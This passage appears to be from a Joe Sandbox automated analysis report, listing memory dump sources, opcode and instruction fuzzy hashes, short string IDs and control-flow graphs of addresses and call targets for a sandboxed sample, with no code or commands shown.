                                                                                                        • Source File: 00000000.00000002.2661482120.00007FF8490C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ff8490c0000_file.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: l:_H
                                                                                                        • API String ID: 0-1013743576
                                                                                                        • Opcode ID: b08fc9bce9942cb94d30a63f4fc3db7e7548aedf5dc8afe16faccf7d32740a44
                                                                                                        • Instruction ID: d00f563854f944847c00a45c68f4f9a664f5723a68e13ba5e889d71637065ac6
                                                                                                        • Opcode Fuzzy Hash: b08fc9bce9942cb94d30a63f4fc3db7e7548aedf5dc8afe16faccf7d32740a44
                                                                                                        • Instruction Fuzzy Hash: AE428131A1CA8A8FDBA8EF18C4957B977E1FF98744F540569D44AC7282CF34E852C781
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2661482120.00007FF8490C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ff8490c0000_file.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 64_^
                                                                                                        • API String ID: 0-1721108549
                                                                                                        • Opcode ID: c1d8321752941cad04e5c013e6c33fd5020482cacf3c765184cc1636280605b9
                                                                                                        • Instruction ID: 204ff16026c4052aed53471f13b0d4c9e5f7dccb80e4841dfe497f7366cd190d
                                                                                                        • Opcode Fuzzy Hash: c1d8321752941cad04e5c013e6c33fd5020482cacf3c765184cc1636280605b9
                                                                                                        • Instruction Fuzzy Hash: 3C918B22E2FB865AEBA8BA7C74451F677E0EF55764F04427AC08D8F193CD1CA8834285

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 0 7ff8490c7366-7ff8490c7372 2 7ff8490c7374-7ff8490c73a7 0->2 3 7ff8490c73bc-7ff8490c73c5 0->3 5 7ff8490c73c7 3->5 6 7ff8490c73cd 3->6 5->6 7 7ff8490c73d0-7ff8490c74d2 call 7ff8490c2600 call 7ff8490c26f0 call 7ff8490c2c20 6->7 8 7ff8490c73cf 6->8 22 7ff8490c75d4-7ff8490c7641 call 7ff8490c1bb0 * 2 call 7ff8490c1de0 7->22 23 7ff8490c74d8-7ff8490c74eb 7->23 8->7 52 7ff8490c7647-7ff8490c765e 22->52 53 7ff8490c7786-7ff8490c77a4 call 7ff8490c6660 22->53 28 7ff8490c7543-7ff8490c7571 call 7ff8490c1bb0 call 7ff8490c1210 call 7ff8490c09b0 23->28 29 7ff8490c74ed-7ff8490c74f1 23->29 45 7ff8490c7573-7ff8490c758f 28->45 46 7ff8490c75b6-7ff8490c75cf 28->46 29->22 32 7ff8490c74f7-7ff8490c7513 29->32 32->22 42 7ff8490c7519-7ff8490c753e 32->42 42->22 45->46 54 7ff8490c7591-7ff8490c75ae 45->54 46->22 59 7ff8490c7660-7ff8490c766e 52->59 60 7ff8490c7678-7ff8490c7695 call 7ff8490c1bb0 52->60 64 7ff8490c7b03-7ff8490c7b0e 53->64 65 7ff8490c77aa-7ff8490c77ff call 7ff8490c1210 call 7ff8490c5140 53->65 54->46 59->60 66 7ff8490c7670-7ff8490c7676 59->66 70 7ff8490c769b-7ff8490c76f3 call 7ff8490c1210 call 7ff8490c6010 call 7ff8490c1bb0 call 7ff8490c5a50 call 7ff8490c1de0 60->70 71 7ff8490c79a9-7ff8490c79ee call 7ff8490c1210 call 7ff8490c6010 call 7ff8490c09e8 60->71 74 7ff8490c7b10-7ff8490c7b3c 64->74 75 7ff8490c7ab9-7ff8490c7ae0 64->75 100 7ff8490c7804-7ff8490c789a call 7ff8490c08f0 call 7ff8490c1b00 call 7ff8490c27b0 call 7ff8490c6010 call 7ff8490c09d0 65->100 66->60 106 7ff8490c7931-7ff8490c79a2 70->106 124 7ff8490c76f9-7ff8490c7717 70->124 109 7ff8490c7af7-7ff8490c7afe 71->109 110 7ff8490c79f4-7ff8490c7a0d call 7ff8490c1bb0 71->110 88 7ff8490c7b79-7ff8490c7bc0 74->88 89 7ff8490c7b3e-7ff8490c7b4e call 7ff8490c5140 74->89 85 7ff8490c7ae6 75->85 86 7ff8490c7a59-7ff8490c7a64 75->86 92 7ff8490c7757-7ff8490c7780 85->92 94 7ff8490c7a6a-7ff8490c7ab3 86->94 95 7ff8490c792c 86->95 89->100 92->52 92->53 94->75 95->106 147 7ff8490c78df-7ff8490c78e2 100->147 148 7ff8490c789c-7ff8490c78b8 100->148 106->71 117 7ff8490c7a2d-7ff8490c7a53 call 7ff8490c09f0 call 7ff8490c1de0 109->117 110->95 125 7ff8490c7a13-7ff8490c7a27 110->125 117->86 117->92 124->95 129 7ff8490c771d-7ff8490c7750 124->129 125->117 130 7ff8490c7aeb-7ff8490c7af2 125->130 129->92 130->110 149 7ff8490c7b53-7ff8490c7b75 call 7ff8490c7b76 call 7ff8490c7bc1 147->149 150 7ff8490c78e8-7ff8490c78fb 147->150 148->147 157 7ff8490c78ba-7ff8490c78d7 148->157 149->88 150->149 156 7ff8490c7901-7ff8490c7927 call 7ff8490c1210 call 7ff8490c0a28 call 7ff8490c27b0 150->156 156->149 157->147
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2661482120.00007FF8490C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ff8490c0000_file.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: >O]H$HI$HI
                                                                                                        • API String ID: 0-2578062900
                                                                                                        • Opcode ID: 3ecd40ff5655e0e9150009ba622ab1958f659d89cc2b70f3cd393518aa6f3116
                                                                                                        • Instruction ID: 0726faf09fc1bc1592f187bc6e78f60c6fbf68d196eeb0e1ff78cb67eda186b5
                                                                                                        • Opcode Fuzzy Hash: 3ecd40ff5655e0e9150009ba622ab1958f659d89cc2b70f3cd393518aa6f3116
                                                                                                        • Instruction Fuzzy Hash: E3526130A1CA598FEFA8EF289855AA977E1FF99740F1441B9D04DC7292DE34EC41CB81

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 167 7ff8490cb535-7ff8490cb557 169 7ff8490cb56e-7ff8490cb62f call 7ff8490cafc0 167->169 170 7ff8490cb559-7ff8490cb55c 167->170 181 7ff8490cb694-7ff8490cb6a3 169->181 182 7ff8490cb631-7ff8490cb670 call 7ff8490c92a0 169->182 170->169 171 7ff8490cb55e-7ff8490cb56d 170->171 185 7ff8490cb714-7ff8490cb72a 181->185 186 7ff8490cb6a5-7ff8490cb6b9 181->186 193 7ff8490cb675-7ff8490cb67d call 7ff8490c0a68 182->193 190 7ff8490cb6cf-7ff8490cb6d7 185->190 192 7ff8490cb72c-7ff8490cb751 185->192 186->190 194 7ff8490cbc64-7ff8490cbc69 190->194 195 7ff8490cb6dd-7ff8490cb6ed 190->195 203 7ff8490cb753-7ff8490cb763 call 7ff8490c26f0 192->203 204 7ff8490cb76a-7ff8490cb896 call 7ff8490c26f0 call 7ff8490c92a0 call 7ff8490c27b0 call 7ff8490c1bb0 call 7ff8490c7cf0 192->204 200 7ff8490cb682-7ff8490cb693 193->200 195->194 198 7ff8490cb6f3-7ff8490cb706 195->198 198->194 201 7ff8490cb70c-7ff8490cb712 198->201 201->185 203->204 226 7ff8490cb89c-7ff8490cb8b3 204->226 227 7ff8490cb9e8-7ff8490cba16 call 7ff8490c6660 call 7ff8490c5970 call 7ff8490c1210 204->227 231 7ff8490cb8b5-7ff8490cb8c3 226->231 232 7ff8490cb8cd-7ff8490cb8ea call 7ff8490c1bb0 226->232 247 7ff8490cba82 227->247 248 7ff8490cba18-7ff8490cba7e call 7ff8490c5140 call 7ff8490c1210 227->248 231->232 238 7ff8490cb8c5-7ff8490cb8cb 231->238 241 7ff8490cbb05-7ff8490cbb44 call 7ff8490c1210 call 7ff8490c6010 call 7ff8490c09e8 232->241 242 7ff8490cb8f0-7ff8490cb948 call 7ff8490c1210 call 7ff8490c6010 call 7ff8490c1bb0 call 7ff8490c5a50 call 7ff8490c1de0 232->242 238->232 270 7ff8490cbb46-7ff8490cbb56 call 7ff8490c1bb0 241->270 271 7ff8490cbb70-7ff8490cbb90 call 7ff8490c09f0 call 7ff8490c1de0 241->271 284 7ff8490cba8d-7ff8490cbabc 242->284 285 7ff8490cb94e-7ff8490cb966 242->285 251 7ff8490cba83 247->251 248->251 257 7ff8490cbc41-7ff8490cbc63 call 7ff8490cbc6a call 7ff8490cbcb5 251->257 282 7ff8490cbb5c-7ff8490cbb6e 270->282 283 7ff8490cba88 270->283 289 7ff8490cbb96-7ff8490cbb9a 271->289 290 7ff8490cb9b9-7ff8490cb9e2 271->290 282->270 282->271 283->284 304 7ff8490cbac0-7ff8490cbad6 284->304 285->283 288 7ff8490cb96c-7ff8490cb9b4 call 7ff8490c27b0 call 7ff8490c1de0 285->288 288->290 289->283 291 7ff8490cbba0-7ff8490cbc36 call 7ff8490c27b0 call 7ff8490c1de0 289->291 290->226 290->227 291->289 313 7ff8490cbc3c 291->313 308 7ff8490cbad8-7ff8490cbafe 304->308 308->241 313->257 313->290
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2661482120.00007FF8490C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ff8490c0000_file.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 9_H$HI
                                                                                                        • API String ID: 0-4253292414
                                                                                                        • Opcode ID: ac53009c495dc5686219590d2e4a8c749e186769a76c9c848ff3f3ec0efa7fc7
                                                                                                        • Instruction ID: 5c4e64ccd8338fd78ad5387ad96fdcfa9aef84fdb91f3e95fd5524b4b4f67bef
                                                                                                        • Opcode Fuzzy Hash: ac53009c495dc5686219590d2e4a8c749e186769a76c9c848ff3f3ec0efa7fc7
                                                                                                        • Instruction Fuzzy Hash: 60327230A1CA598FDBA8EF28D455AA977E1FF98740F1041B9D04EC7296DE35EC42CB81

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 314 7ff8490c73a9-7ff8490c73b7 315 7ff8490c73ba-7ff8490c73c5 314->315 316 7ff8490c73b9 314->316 318 7ff8490c73c7 315->318 319 7ff8490c73cd 315->319 316->315 318->319 320 7ff8490c73d0-7ff8490c73dd 319->320 321 7ff8490c73cf 319->321 322 7ff8490c73df-7ff8490c7430 call 7ff8490c2600 320->322 321->320 324 7ff8490c7435-7ff8490c74d2 call 7ff8490c26f0 call 7ff8490c2c20 322->324 335 7ff8490c75d4-7ff8490c7614 call 7ff8490c1bb0 * 2 call 7ff8490c1de0 324->335 336 7ff8490c74d8-7ff8490c74eb 324->336 354 7ff8490c7619-7ff8490c761e 335->354 341 7ff8490c7543-7ff8490c7571 call 7ff8490c1bb0 call 7ff8490c1210 call 7ff8490c09b0 336->341 342 7ff8490c74ed-7ff8490c74f1 336->342 358 7ff8490c7573-7ff8490c758f 341->358 359 7ff8490c75b6-7ff8490c75cf 341->359 342->335 345 7ff8490c74f7-7ff8490c7513 342->345 345->335 355 7ff8490c7519-7ff8490c753e 345->355 360 7ff8490c7626-7ff8490c7641 354->360 355->335 358->359 367 7ff8490c7591-7ff8490c75ae 358->367 359->335 365 7ff8490c7647-7ff8490c765e 360->365 366 7ff8490c7786-7ff8490c77a4 call 7ff8490c6660 360->366 372 7ff8490c7660-7ff8490c766e 365->372 373 7ff8490c7678-7ff8490c7695 call 7ff8490c1bb0 365->373 377 7ff8490c7b03-7ff8490c7b0e 366->377 378 7ff8490c77aa-7ff8490c77ff call 7ff8490c1210 call 7ff8490c5140 366->378 367->359 372->373 379 7ff8490c7670-7ff8490c7676 372->379 383 7ff8490c769b-7ff8490c76f3 call 7ff8490c1210 call 7ff8490c6010 call 7ff8490c1bb0 call 7ff8490c5a50 call 7ff8490c1de0 373->383 384 7ff8490c79a9-7ff8490c79ee call 7ff8490c1210 call 7ff8490c6010 call 7ff8490c09e8 373->384 387 7ff8490c7b10-7ff8490c7b3c 377->387 388 7ff8490c7ab9-7ff8490c7ae0 377->388 413 7ff8490c7804-7ff8490c789a call 7ff8490c08f0 call 7ff8490c1b00 call 7ff8490c27b0 call 7ff8490c6010 call 7ff8490c09d0 378->413 379->373 419 7ff8490c7931-7ff8490c79a2 383->419 437 7ff8490c76f9-7ff8490c7717 383->437 422 7ff8490c7af7-7ff8490c7afe 384->422 423 7ff8490c79f4-7ff8490c7a0d call 7ff8490c1bb0 384->423 401 7ff8490c7b79-7ff8490c7bc0 387->401 402 7ff8490c7b3e-7ff8490c7b4e call 7ff8490c5140 387->402 398 7ff8490c7ae6 388->398 399 7ff8490c7a59-7ff8490c7a64 388->399 405 7ff8490c7757-7ff8490c7780 398->405 407 7ff8490c7a6a-7ff8490c7ab3 399->407 408 7ff8490c792c 399->408 402->413 405->365 405->366 407->388 408->419 460 7ff8490c78df-7ff8490c78e2 413->460 461 7ff8490c789c-7ff8490c78b8 413->461 419->384 430 7ff8490c7a2d-7ff8490c7a53 call 7ff8490c09f0 call 7ff8490c1de0 422->430 423->408 438 7ff8490c7a13-7ff8490c7a27 423->438 430->399 430->405 437->408 442 7ff8490c771d-7ff8490c7728 437->442 438->430 443 7ff8490c7aeb-7ff8490c7af2 438->443 446 7ff8490c772a-7ff8490c7750 442->446 443->423 446->405 462 7ff8490c7b53-7ff8490c7b75 call 7ff8490c7b76 call 7ff8490c7bc1 460->462 463 7ff8490c78e8-7ff8490c78fb 460->463 461->460 470 7ff8490c78ba-7ff8490c78d7 461->470 462->401 463->462 469 7ff8490c7901-7ff8490c7927 call 7ff8490c1210 call 7ff8490c0a28 call 7ff8490c27b0 463->469 469->462 470->460
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2661482120.00007FF8490C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ff8490c0000_file.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: >O]H$HI
                                                                                                        • API String ID: 0-759595582
                                                                                                        • Opcode ID: 4d5b983483e1248f82b0348c168dfac0a9aefdc648b9870b013435e578b7d7d3
                                                                                                        • Instruction ID: ee6f728bf380216e76407b723b387e7467a51d2c2c26f153212786b2a6ca52c3
                                                                                                        • Opcode Fuzzy Hash: 4d5b983483e1248f82b0348c168dfac0a9aefdc648b9870b013435e578b7d7d3
                                                                                                        • Instruction Fuzzy Hash: E8027F30A1CA998FDFA8EB289455BA977E2FF99740F1401B9D04DC7296DE34EC41CB81

                                                                                                        Control-flow Graph

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2661482120.00007FF8490C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ff8490c0000_file.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: p_I$p_I
                                                                                                        • API String ID: 0-3690619792
                                                                                                        • Opcode ID: 958fc2b36fd9159ac38ee0f107238afbd398b52680da6566a2e0678c0fa46ce2
                                                                                                        • Instruction ID: 5f7b168c6f8139cb35553e7b097c9ffc7157aec0166bf3a36bf9ff99638d9471
                                                                                                        • Opcode Fuzzy Hash: 958fc2b36fd9159ac38ee0f107238afbd398b52680da6566a2e0678c0fa46ce2
                                                                                                        • Instruction Fuzzy Hash: CAA14A31E1CACB4FEB6DEB2894552B977E1EF95391F04057AD04AC7186DE2CE8468381

                                                                                                        Control-flow Graph

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2661482120.00007FF8490C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ff8490c0000_file.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: p_I$p_I
                                                                                                        • API String ID: 0-3690619792
                                                                                                        • Opcode ID: b626a0118f500c29f9bc1eb805b8f9b7b1faff5e8d7c3a5cc17a887d4fcfbcf9
                                                                                                        • Instruction ID: bd8c02700f36440b568689879dc6d3bde9e873651be7a65075a148023e12f16a
                                                                                                        • Opcode Fuzzy Hash: b626a0118f500c29f9bc1eb805b8f9b7b1faff5e8d7c3a5cc17a887d4fcfbcf9
                                                                                                        • Instruction Fuzzy Hash: F5714831E0DBD68FEBA9EB38D44917577D0EF54690B0809BED049C75D2DB28E8868341

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 585 7ff8490cfb43-7ff8490cfb51 586 7ff8490cfb54-7ff8490cfb69 585->586 587 7ff8490cfb53 585->587 589 7ff8490cfb78-7ff8490cfb7c 586->589 590 7ff8490cfb6b-7ff8490cfb70 586->590 587->586 592 7ff8490cfb72-7ff8490cfb77 589->592 593 7ff8490cfb7e-7ff8490cfb7f 589->593 591 7ff8490cfbb7-7ff8490cfbd9 590->591 590->592 595 7ff8490cfb82-7ff8490cfbb0 591->595 599 7ff8490cfbdb-7ff8490cfc23 591->599 593->595 595->591 604 7ff8490cfc2b-7ff8490cfc32 599->604 605 7ff8490cfc34-7ff8490cfc3e 604->605 606 7ff8490cfc41-7ff8490cfc48 604->606 605->606 607 7ff8490cfc51-7ff8490cfc57 606->607 608 7ff8490cfc4a 606->608 608->607
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2661482120.00007FF8490C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ff8490c0000_file.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: p_I$p_I
                                                                                                        • API String ID: 0-3690619792
                                                                                                        • Opcode ID: 51daf436e4443af9406bbe28addf2ca946a5e66357d83f6b83e405228a68c73c
                                                                                                        • Instruction ID: 6b1e7ad221d423d5fb8c1396f20c602d17422b73c09564e9dc7caf671bb929e7
                                                                                                        • Opcode Fuzzy Hash: 51daf436e4443af9406bbe28addf2ca946a5e66357d83f6b83e405228a68c73c
                                                                                                        • Instruction Fuzzy Hash: 9B312630D0CA864FEBBDAA3854652B53BE1FF14341F1400BEC14AC25D2DF69E8868342
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2661482120.00007FF8490C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ff8490c0000_file.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: HI
                                                                                                        • API String ID: 0-2688142512
                                                                                                        • Opcode ID: 52f1c9493aeb46b65beb82f8a431499b7b365a49b7e436016ee7f32c4dcca6c9
                                                                                                        • Instruction ID: c449cf910b0b5323b61385118f4e03f7462f1e0c459b5ebeb1c6a9094cf5fcb5
                                                                                                        • Opcode Fuzzy Hash: 52f1c9493aeb46b65beb82f8a431499b7b365a49b7e436016ee7f32c4dcca6c9
                                                                                                        • Instruction Fuzzy Hash: B5621761D1D6C64FEBBDAB2448169B53BE0EF56394F0401FDD58ECB5E3EA1CA80A8341

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 864 7ff8490c5140-7ff8490c514c 865 7ff8490c5196 864->865 866 7ff8490c514e-7ff8490c5177 call 7ff8490c0968 864->866 868 7ff8490c519a-7ff8490c51ac 865->868 869 7ff8490c517c-7ff8490c518b 866->869 872 7ff8490c51e3-7ff8490c51f5 868->872 873 7ff8490c51ae-7ff8490c51c0 868->873 869->873 878 7ff8490c518d-7ff8490c5194 869->878 876 7ff8490c5271-7ff8490c5274 872->876 877 7ff8490c51f7-7ff8490c51fa 872->877 874 7ff8490c51c2-7ff8490c51c5 873->874 875 7ff8490c523c-7ff8490c523d 873->875 879 7ff8490c5241 874->879 880 7ff8490c51c7 874->880 883 7ff8490c523e-7ff8490c5240 875->883 881 7ff8490c5276 876->881 877->881 882 7ff8490c51fc 877->882 878->868 884 7ff8490c5242-7ff8490c524c 879->884 885 7ff8490c51c9-7ff8490c51cd 880->885 886 7ff8490c520d-7ff8490c5219 880->886 888 7ff8490c52f7-7ff8490c52fb 881->888 889 7ff8490c5278-7ff8490c52a5 881->889 882->884 887 7ff8490c51fe-7ff8490c5209 882->887 883->879 898 7ff8490c524e 884->898 885->883 890 7ff8490c51cf-7ff8490c51d2 885->890 894 7ff8490c525b-7ff8490c5261 886->894 895 7ff8490c521a-7ff8490c522d 886->895 904 7ff8490c524f-7ff8490c5254 887->904 906 7ff8490c520b 887->906 891 7ff8490c5301-7ff8490c531f 888->891 892 7ff8490c53bd-7ff8490c53cf 888->892 897 7ff8490c51d4 890->897 890->898 891->892 915 7ff8490c53d5-7ff8490c53d8 892->915 916 7ff8490c54fd-7ff8490c5500 892->916 900 7ff8490c5263-7ff8490c5268 894->900 901 7ff8490c52d2-7ff8490c52d6 894->901 895->894 918 7ff8490c522f-7ff8490c5236 895->918 897->895 903 7ff8490c51d6-7ff8490c51e1 897->903 898->894 898->904 908 7ff8490c526a-7ff8490c526f 900->908 909 7ff8490c52e9-7ff8490c52f6 900->909 910 7ff8490c590e-7ff8490c5920 901->910 911 7ff8490c52dc 901->911 903->894 904->894 913 7ff8490c5256 call 7ff8490c0a18 904->913 906->886 908->876 917 7ff8490c52e0 908->917 920 7ff8490c5922-7ff8490c5978 910->920 911->917 913->894 921 7ff8490c5718-7ff8490c5721 915->921 922 7ff8490c53de-7ff8490c53e1 915->922 923 7ff8490c5502-7ff8490c5505 916->923 924 7ff8490c54f0-7ff8490c54fc 916->924 917->924 925 7ff8490c52e6-7ff8490c52e7 917->925 918->875 987 7ff8490c59c2-7ff8490c5a2a call 7ff8490c5140 920->987 988 7ff8490c597a-7ff8490c59a3 920->988 926 7ff8490c5723-7ff8490c5739 921->926 927 7ff8490c573b-7ff8490c574f 921->927 929 7ff8490c53e7-7ff8490c53ea 922->929 930 7ff8490c5676-7ff8490c567f 922->930 931 7ff8490c5601-7ff8490c560a 923->931 932 7ff8490c550b-7ff8490c5511 923->932 925->909 926->927 956 7ff8490c5751-7ff8490c5765 927->956 957 7ff8490c57ac 927->957 936 7ff8490c53f0-7ff8490c53f9 929->936 937 7ff8490c57cb-7ff8490c5806 929->937 933 7ff8490c5681-7ff8490c5697 930->933 934 7ff8490c5699-7ff8490c56ad 930->934 939 7ff8490c5623-7ff8490c5639 931->939 940 7ff8490c560c-7ff8490c5619 931->940 932->937 938 7ff8490c5517-7ff8490c5520 932->938 933->934 961 7ff8490c570a 934->961 962 7ff8490c56af-7ff8490c56c3 934->962 946 7ff8490c5413-7ff8490c5427 936->946 947 7ff8490c53fb-7ff8490c5411 936->947 983 7ff8490c580d-7ff8490c5810 937->983 948 7ff8490c5522-7ff8490c552f 938->948 949 7ff8490c5539-7ff8490c554f 938->949 964 7ff8490c563b-7ff8490c5656 call 7ff8490c0960 939->964 965 7ff8490c5658 939->965 940->939 951 7ff8490c561b-7ff8490c5621 940->951 969 7ff8490c57c1 946->969 970 7ff8490c542d-7ff8490c5441 946->970 947->946 948->949 960 7ff8490c5531-7ff8490c5537 948->960 974 7ff8490c5555-7ff8490c556b 949->974 975 7ff8490c566b-7ff8490c5671 949->975 951->939 980 7ff8490c5767-7ff8490c577b 956->980 981 7ff8490c577d-7ff8490c57a6 call 7ff8490c0960 956->981 967 7ff8490c57b1-7ff8490c57b5 957->967 960->949 973 7ff8490c570f-7ff8490c5713 961->973 990 7ff8490c56c5-7ff8490c56d9 962->990 991 7ff8490c56db-7ff8490c5704 call 7ff8490c0960 962->991 976 7ff8490c565d-7ff8490c5661 964->976 965->976 978 7ff8490c55f4-7ff8490c55f6 967->978 969->937 1001 7ff8490c5443-7ff8490c5457 970->1001 1002 7ff8490c545d-7ff8490c5484 call 7ff8490c0960 970->1002 973->978 974->975 1003 7ff8490c5571-7ff8490c5581 974->1003 979 7ff8490c55d3-7ff8490c55d9 975->979 976->978 978->983 984 7ff8490c55fc 978->984 979->978 989 7ff8490c55db-7ff8490c55ee 979->989 980->981 1007 7ff8490c57a8-7ff8490c57aa 980->1007 981->967 995 7ff8490c5812-7ff8490c5818 983->995 996 7ff8490c581a-7ff8490c5879 983->996 984->924 988->987 989->949 989->978 990->991 1015 7ff8490c5706-7ff8490c5708 990->1015 991->973 995->996 1004 7ff8490c5880-7ff8490c58d6 995->1004 996->1004 1001->1002 1023 7ff8490c57ba-7ff8490c57bc 1001->1023 1030 7ff8490c5487-7ff8490c548d 1002->1030 1024 7ff8490c5583-7ff8490c5599 1003->1024 1025 7ff8490c55b7-7ff8490c55d0 call 7ff8490c0960 1003->1025 1004->920 1053 7ff8490c58d8-7ff8490c5907 1004->1053 1007->967 1015->973 1023->1030 1024->1025 1040 7ff8490c559b-7ff8490c55b1 1024->1040 1025->979 1030->978 1033 7ff8490c5493-7ff8490c5499 1030->1033 1041 7ff8490c549b-7ff8490c54ab 1033->1041 1042 7ff8490c54ac-7ff8490c54af 1033->1042 1040->1025 1054 7ff8490c5663-7ff8490c5666 1040->1054 1041->1042 1042->924 1048 7ff8490c54b1-7ff8490c54ea 1042->1048 1048->924 1048->978 1053->910 1054->979
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2661482120.00007FF8490C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ff8490c0000_file.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 3_H
                                                                                                        • API String ID: 0-1213649542
                                                                                                        • Opcode ID: fe32940cf812258df7037b6576642d5065903486dc41e99e505d31173775e9e4
                                                                                                        • Instruction ID: f0de82faade9ec98dbfd4ae1a53cb022f5137ff5b6ecb0cad5f1a8ca860047a7
                                                                                                        • Opcode Fuzzy Hash: fe32940cf812258df7037b6576642d5065903486dc41e99e505d31173775e9e4
                                                                                                        • Instruction Fuzzy Hash: 06529F75A1C9898FEFA8EF2CD459A7937D1FF58340B1501B9E44EC72A2DE28EC818741

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1325 7ff8490c7cd5-7ff8490c7d09 1328 7ff8490c7e52-7ff8490c7e5d 1325->1328 1329 7ff8490c7d0d-7ff8490c7d12 1325->1329 1331 7ff8490c7d18-7ff8490c7d20 1329->1331 1332 7ff8490c7e8c-7ff8490c7ebf 1329->1332 1334 7ff8490c7ec6-7ff8490c7f19 1331->1334 1335 7ff8490c7d26-7ff8490c7d4a 1331->1335 1332->1334 1350 7ff8490c7f1a-7ff8490c7f2d 1334->1350 1335->1329 1339 7ff8490c7d4c-7ff8490c7d56 1335->1339 1342 7ff8490c7d57-7ff8490c7d5b 1339->1342 1343 7ff8490c7e3e-7ff8490c7e51 1339->1343 1345 7ff8490c7d5c-7ff8490c7d5f 1342->1345 1347 7ff8490c7d60-7ff8490c7d6f 1345->1347 1348 7ff8490c7d7e-7ff8490c7d7f 1345->1348 1349 7ff8490c7d75-7ff8490c7d7c 1347->1349 1347->1350 1351 7ff8490c7d81-7ff8490c7d84 1348->1351 1349->1348 1349->1351 1359 7ff8490c7f37-7ff8490c7f48 1350->1359 1360 7ff8490c7f2f-7ff8490c7f36 1350->1360 1353 7ff8490c7d86-7ff8490c7dae 1351->1353 1354 7ff8490c7df8-7ff8490c7dff 1351->1354 1353->1342 1362 7ff8490c7db0-7ff8490c7df5 1353->1362 1354->1350 1357 7ff8490c7e05-7ff8490c7e38 1354->1357 1357->1343 1357->1345 1363 7ff8490c7f5a-7ff8490c7fc2 1359->1363 1364 7ff8490c7f4a-7ff8490c7f58 1359->1364 1360->1359 1362->1354 1371 7ff8490c7ff7-7ff8490c8024 1363->1371 1372 7ff8490c7fc4-7ff8490c7fcc 1363->1372 1364->1363 1378 7ff8490c8132-7ff8490c8149 1371->1378 1379 7ff8490c802a-7ff8490c80a2 call 7ff8490c1bb0 call 7ff8490c1210 call 7ff8490c09b0 call 7ff8490c1210 call 7ff8490c0a20 call 7ff8490c1c00 call 7ff8490c6660 call 7ff8490c1210 1371->1379 1374 7ff8490c7fd4-7ff8490c7fe7 1372->1374 1377 7ff8490c7fe9-7ff8490c7ff2 1374->1377 1380 7ff8490c8291-7ff8490c82a9 1377->1380 1388 7ff8490c814f-7ff8490c8258 call 7ff8490c1bb0 * 2 call 7ff8490c26f0 call 7ff8490c1210 call 7ff8490c09b0 call 7ff8490c1210 call 7ff8490c16c0 call 7ff8490c1de0 call 7ff8490c0950 call 7ff8490c1210 call 7ff8490c82fd 1378->1388 1389 7ff8490c825a-7ff8490c826f call 7ff8490c1210 call 7ff8490c0a28 1378->1389 1425 